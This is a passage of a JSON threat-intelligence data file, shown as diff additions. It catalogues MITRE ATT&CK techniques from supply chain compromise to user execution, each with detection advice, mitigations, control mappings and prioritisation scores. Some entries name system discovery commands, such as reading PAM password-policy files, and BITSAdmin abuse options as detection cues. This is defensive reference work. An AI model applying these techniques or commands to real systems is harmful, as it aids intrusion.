+        "description": "Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply chain compromise can take place at any stage of the supply chain including:\n\n* Manipulation of development tools\n* Manipulation of a development environment\n* Manipulation of source code repositories (public or private)\n* Manipulation of source code in open-source dependencies\n* Manipulation of software update/distribution mechanisms\n* Compromised/infected system images (multiple cases of removable media infected at the factory) (Citation: IBM Storwize) (Citation: Schneider Electric USB Malware) \n* Replacement of legitimate software with modified versions\n* Sales of modified/counterfeit products to legitimate distributors\n* Shipment interdiction\n\nWhile supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired victim set (Citation: Symantec Elderwood Sept 2012) or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise)",
+        "url": "https://attack.mitre.org/techniques/T1195",
+        "tactics": [
+            "Initial Access"
+        ],
+        "detection": "Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. Perform physical inspection of hardware to look for potential tampering.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1195.001",
+                "name": "Supply Chain Compromise: Compromise Software Dependencies and Development Tools",
+                "url": "https://attack.mitre.org/techniques/T1195/001",
+                "description": "Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise)  \n\nTargeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. ",
+                "detection": "Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. ",
+                "mitigations": [
+                    {
+                        "mid": "M1051",
+                        "name": "Update Software",
+                        "description": "Perform regular software updates to mitigate exploitation risk.",
+                        "url": "https://attack.mitre.org/mitigations/M1051"
+                    },
+                    {
+                        "mid": "M1016",
+                        "name": "Vulnerability Scanning",
+                        "description": "Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.",
+                        "url": "https://attack.mitre.org/mitigations/M1016"
+                    }
+                ]
+            },
+            {
+                "tid": "T1195.002",
+                "name": "Supply Chain Compromise: Compromise Software Supply Chain",
+                "url": "https://attack.mitre.org/techniques/T1195/002",
+                "description": "Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.\n\nTargeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011)  ",
+                "detection": "Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. ",
+                "mitigations": [
+                    {
+                        "mid": "M1051",
+                        "name": "Update Software",
+                        "description": "Perform regular software updates to mitigate exploitation risk.",
+                        "url": "https://attack.mitre.org/mitigations/M1051"
+                    },
+                    {
+                        "mid": "M1016",
+                        "name": "Vulnerability Scanning",
+                        "description": "Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.",
+                        "url": "https://attack.mitre.org/mitigations/M1016"
+                    }
+                ]
+            },
+            {
+                "tid": "T1195.003",
+                "name": "Supply Chain Compromise: Compromise Hardware Supply Chain",
+                "url": "https://attack.mitre.org/techniques/T1195/003",
+                "description": "Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals.",
+                "detection": "Perform physical inspection of hardware to look for potential tampering. Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes.",
+                "mitigations": [
+                    {
+                        "mid": "M1046",
+                        "name": "Boot Integrity",
+                        "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.",
+                        "url": "https://attack.mitre.org/mitigations/M1046"
+                    }
+                ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1051",
+                "name": "Update Software",
+                "description": "Perform regular software updates to mitigate exploitation risk.",
+                "url": "https://attack.mitre.org/mitigations/M1051"
+            },
+            {
+                "mid": "M1016",
+                "name": "Vulnerability Scanning",
+                "description": "Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.",
+                "url": "https://attack.mitre.org/mitigations/M1016"
+            }
+        ],
+        "cumulative_score": 0.3516381976190477,
+        "adjusted_score": 0.3516381976190477,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "7.1",
+            "7.2",
+            "7.3",
+            "7.4",
+            "7.5",
+            "16.1",
+            "16.11",
+            "16.12",
+            "16.2",
+            "16.3",
+            "16.4",
+            "16.5",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "CA-2",
+            "CA-7",
+            "CM-11",
+            "CM-7",
+            "RA-10",
+            "RA-5",
+            "SA-22",
+            "SI-2"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": true,
+        "actionability_score": {
+            "combined_score": 0.24761904761904766,
+            "mitigation_score": 0.4,
+            "detection_score": 0.08
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00401915
+    },
+    {
+        "tid": "T1195.001",
+        "name": "Supply Chain Compromise: Compromise Software Dependencies and Development Tools",
+        "description": "Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise)  \n\nTargeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. ",
+        "url": "https://attack.mitre.org/techniques/T1195/001",
+        "tactics": [
+            "Initial Access"
+        ],
+        "detection": "Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. ",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [],
+        "is_subtechnique": true,
+        "supertechnique": "T1195",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1051",
+                "name": "Update Software",
+                "description": "Perform regular software updates to mitigate exploitation risk.",
+                "url": "https://attack.mitre.org/mitigations/M1051"
+            },
+            {
+                "mid": "M1016",
+                "name": "Vulnerability Scanning",
+                "description": "Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.",
+                "url": "https://attack.mitre.org/mitigations/M1016"
+            }
+        ],
+        "cumulative_score": 0.3238095238095239,
+        "adjusted_score": 0.3238095238095239,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "7.1",
+            "7.2",
+            "7.3",
+            "7.4",
+            "7.5",
+            "16.1",
+            "16.11",
+            "16.12",
+            "16.2",
+            "16.3",
+            "16.4",
+            "16.5",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "CA-2",
+            "CA-7",
+            "CM-11",
+            "CM-7",
+            "RA-10",
+            "RA-5",
+            "SA-22",
+            "SI-2"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1195.002",
+        "name": "Supply Chain Compromise: Compromise Software Supply Chain",
+        "description": "Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.\n\nTargeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011)  ",
+        "url": "https://attack.mitre.org/techniques/T1195/002",
+        "tactics": [
+            "Initial Access"
+        ],
+        "detection": "Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. ",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [],
+        "is_subtechnique": true,
+        "supertechnique": "T1195",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1051",
+                "name": "Update Software",
+                "description": "Perform regular software updates to mitigate exploitation risk.",
+                "url": "https://attack.mitre.org/mitigations/M1051"
+            },
+            {
+                "mid": "M1016",
+                "name": "Vulnerability Scanning",
+                "description": "Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.",
+                "url": "https://attack.mitre.org/mitigations/M1016"
+            }
+        ],
+        "cumulative_score": 0.33333333333333337,
+        "adjusted_score": 0.33333333333333337,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "7.1",
+            "7.2",
+            "7.3",
+            "7.4",
+            "7.5",
+            "16.1",
+            "16.11",
+            "16.12",
+            "16.2",
+            "16.3",
+            "16.4",
+            "16.5",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "CA-2",
+            "CA-7",
+            "CM-11",
+            "CM-7",
+            "RA-10",
+            "RA-5",
+            "SA-22",
+            "SI-2"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1195.003",
+        "name": "Supply Chain Compromise: Compromise Hardware Supply Chain",
+        "description": "Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals.",
+        "url": "https://attack.mitre.org/techniques/T1195/003",
+        "tactics": [
+            "Initial Access"
+        ],
+        "detection": "Perform physical inspection of hardware to look for potential tampering. Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [],
+        "is_subtechnique": true,
+        "supertechnique": "T1195",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1046",
+                "name": "Boot Integrity",
+                "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.",
+                "url": "https://attack.mitre.org/mitigations/M1046"
+            }
+        ],
+        "cumulative_score": 0.22380952380952382,
+        "adjusted_score": 0.22380952380952382,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "3.6",
+            "4.1"
+        ],
+        "nist_controls": [
+            "CA-8",
+            "CM-3",
+            "CM-5",
+            "CM-8",
+            "IA-7",
+            "RA-9",
+            "SA-10",
+            "SA-11",
+            "SC-34",
+            "SI-2",
+            "SI-7"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": true
+    },
+    {
+        "tid": "T1197",
+        "name": "BITS Jobs",
+        "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.\n\nThe interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin)\n\nAdversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016)\n\nBITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016)",
+        "url": "https://attack.mitre.org/techniques/T1197",
+        "tactics": [
+            "Defense Evasion",
+            "Persistence"
+        ],
+        "detection": "BITS runs as a service and its status can be checked with the Sc query utility (sc query bits).(Citation: Microsoft Issues with BITS July 2011) Active BITS tasks can be enumerated using the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (bitsadmin /list /allusers /verbose).(Citation: Microsoft BITS)\n\nMonitor usage of the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (especially the ‘Transfer’, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options)(Citation: Microsoft BITS) Admin logs, PowerShell logs, and the Windows Event log for BITS activity.(Citation: Elastic - Hunting for Persistence Part 1) Also consider investigating more detailed information about jobs by parsing the BITS job database.(Citation: CTU BITS Malware June 2016)\n\nMonitor and analyze network activity generated by BITS. BITS jobs use HTTP(S) and SMB for remote connections and are tethered to the creating user and will only function when that user is logged on (this rule applies even if a user attaches the job to a service account).(Citation: Microsoft BITS)",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Network Traffic: Network Connection Creation",
+            "Process: Process Creation",
+            "Service: Service Metadata"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1037",
+                "name": "Filter Network Traffic",
+                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                "url": "https://attack.mitre.org/mitigations/M1037"
+            },
+            {
+                "mid": "M1028",
+                "name": "Operating System Configuration",
+                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1028"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 0.6856440557142857,
+        "adjusted_score": 0.6856440557142857,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.1",
+            "4.2",
+            "4.4",
+            "4.5",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "13.4",
+            "18.2",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-4",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "IA-2",
+            "SC-7",
+            "SI-10",
+            "SI-15",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.3857142857142857,
+            "mitigation_score": 0.509090909090909,
+            "detection_score": 0.25
+        },
+        "choke_point_score": 0.25,
+        "prevalence_score": 0.04992977
+    },
+    {
+        "tid": "T1199",
+        "name": "Trusted Relationship",
+        "description": "Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship exploits an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.\n\nOrganizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.(Citation: CISA IT Service Providers)",
+        "url": "https://attack.mitre.org/techniques/T1199",
+        "tactics": [
+            "Initial Access"
+        ],
+        "detection": "Establish monitoring for activity conducted by second and third party providers and other trusted entities that may be leveraged as a means to gain access to the network. Depending on the type of relationship, an adversary may have access to significant amounts of information about the target before conducting an operation, especially if the trusted relationship is based on IT services. Adversaries may be able to act quickly towards an objective, so proper monitoring for behavior related to Credential Access, Lateral Movement, and Collection will be important to detect the intrusion.",
+        "platforms": [
+            "IaaS",
+            "Linux",
+            "SaaS",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "Logon Session: Logon Session Creation",
+            "Logon Session: Logon Session Metadata"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1030",
+                "name": "Network Segmentation",
+                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                "url": "https://attack.mitre.org/mitigations/M1030"
+            },
+            {
+                "mid": "M1052",
+                "name": "User Account Control",
+                "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.",
+                "url": "https://attack.mitre.org/mitigations/M1052"
+            }
+        ],
+        "cumulative_score": 0.24761904761904763,
+        "adjusted_score": 0.24761904761904763,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "3.12",
+            "4.1",
+            "4.4",
+            "12.2",
+            "12.8",
+            "15.7"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "AC-4",
+            "AC-6",
+            "AC-8",
+            "CM-6",
+            "CM-7",
+            "SC-46",
+            "SC-7"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.14761904761904762,
+            "mitigation_score": 0.2545454545454545,
+            "detection_score": 0.03
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1200",
+        "name": "Hardware Additions",
+        "description": "Adversaries may introduce computer accessories, computers, or networking hardware into a system or network that can be used as a vector to gain access. While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping (Citation: Ossmann Star Feb 2011), network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) (Citation: Aleks Weapons Nov 2015), keystroke injection (Citation: Hak5 RubberDuck Dec 2016), kernel memory reading via DMA (Citation: Frisk DMA August 2016), addition of new wireless access to an existing network (Citation: McMillan Pwn March 2012), and others.",
+        "url": "https://attack.mitre.org/techniques/T1200",
+        "tactics": [
+            "Initial Access"
+        ],
+        "detection": "Asset management systems may help with the detection of computer systems or network devices that should not exist on a network. \n\nEndpoint sensors may be able to detect the addition of hardware via USB, Thunderbolt, and other external device communication ports.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1035",
+                "name": "Limit Access to Resource Over Network",
+                "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1035"
+            },
+            {
+                "mid": "M1034",
+                "name": "Limit Hardware Installation",
+                "description": "Block users or groups from installing or using unapproved hardware on systems, including USB devices.",
+                "url": "https://attack.mitre.org/mitigations/M1034"
+            }
+        ],
+        "cumulative_score": 0.26285879714285715,
+        "adjusted_score": 0.26285879714285715,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "1.1",
+            "1.2",
+            "1.4",
+            "4.1",
+            "4.2",
+            "12.2",
+            "12.6",
+            "13.9"
+        ],
+        "nist_controls": [
+            "AC-20",
+            "AC-3",
+            "AC-6",
+            "MP-7",
+            "SC-41"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": true,
+        "actionability_score": {
+            "combined_score": 0.15714285714285714,
+            "mitigation_score": 0.23636363636363636,
+            "detection_score": 0.07
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00571594
+    },
+    {
+        "tid": "T1201",
+        "name": "Password Policy Discovery",
+        "description": "Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).\n\nPassword policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies).\n\nPassword policies can be discovered in cloud environments using available APIs such as GetAccountPasswordPolicy in AWS (Citation: AWS GetPasswordPolicy).",
+        "url": "https://attack.mitre.org/techniques/T1201",
+        "tactics": [
+            "Discovery"
+        ],
+        "detection": "Monitor logs and processes for tools and command line arguments that may indicate they're being used for password policy discovery. Correlate that activity with other suspicious activity from the originating system to reduce potential false positives from valid user or administrator activity. Adversaries will likely attempt to find the password policy early in an operation and the activity is likely to happen with other Discovery activity.",
+        "platforms": [
+            "IaaS",
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: Process Creation",
+            "User Account: User Account Metadata"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
+            }
+        ],
+        "cumulative_score": 0.21064284952380952,
+        "adjusted_score": 0.21064284952380952,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.10952380952380952,
+            "mitigation_score": 0.10909090909090909,
+            "detection_score": 0.11
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00111904
+    },
+    {
+        "tid": "T1202",
+        "name": "Indirect Command Execution",
+        "description": "Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)\n\nAdversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.",
+        "url": "https://attack.mitre.org/techniques/T1202",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Monitor and analyze logs from host-based detection mechanisms, such as Sysmon, for events such as process creations that include or are resulting from parameters associated with invoking programs/commands/files and/or spawning child processes/network connections. (Citation: RSA Forfiles Aug 2017)",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.27053181238095236,
+        "adjusted_score": 0.27053181238095236,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.15238095238095237,
+            "detection_score": 0.32
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.01815086
+    },
+    {
+        "tid": "T1203",
+        "name": "Exploitation for Client Execution",
+        "description": "Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.\n\nSeveral types exist:\n\n### Browser-based Exploitation\n\nWeb browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) and [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.\n\n### Office Applications\n\nCommon office and productivity applications such as Microsoft Office are also targeted through [Phishing](https://attack.mitre.org/techniques/T1566). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.\n\n### Common Third-party Applications\n\nOther applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.",
+        "url": "https://attack.mitre.org/techniques/T1203",
+        "tactics": [
+            "Execution"
+        ],
+        "detection": "Detecting software exploitation may be difficult depending on the tools available. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the browser or Office processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1048",
+                "name": "Application Isolation and Sandboxing",
+                "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.",
+                "url": "https://attack.mitre.org/mitigations/M1048"
+            },
+            {
+                "mid": "M1050",
+                "name": "Exploit Protection",
+                "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.",
+                "url": "https://attack.mitre.org/mitigations/M1050"
+            }
+        ],
+        "cumulative_score": 0.588021040952381,
+        "adjusted_score": 0.588021040952381,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [
+            "AC-4",
+            "AC-6",
+            "CA-7",
+            "CM-8",
+            "SC-18",
+            "SC-2",
+            "SC-29",
+            "SC-3",
+            "SC-30",
+            "SC-39",
+            "SC-44",
+            "SC-7",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.28095238095238095,
+            "mitigation_score": 0.2909090909090909,
+            "detection_score": 0.27
+        },
+        "choke_point_score": 0.3,
+        "prevalence_score": 0.00706866
+    },
+    {
+        "tid": "T1204",
+        "name": "User Execution",
+        "description": "An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).\n\nWhile [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).",
+        "url": "https://attack.mitre.org/techniques/T1204",
+        "tactics": [
+            "Execution"
+        ],
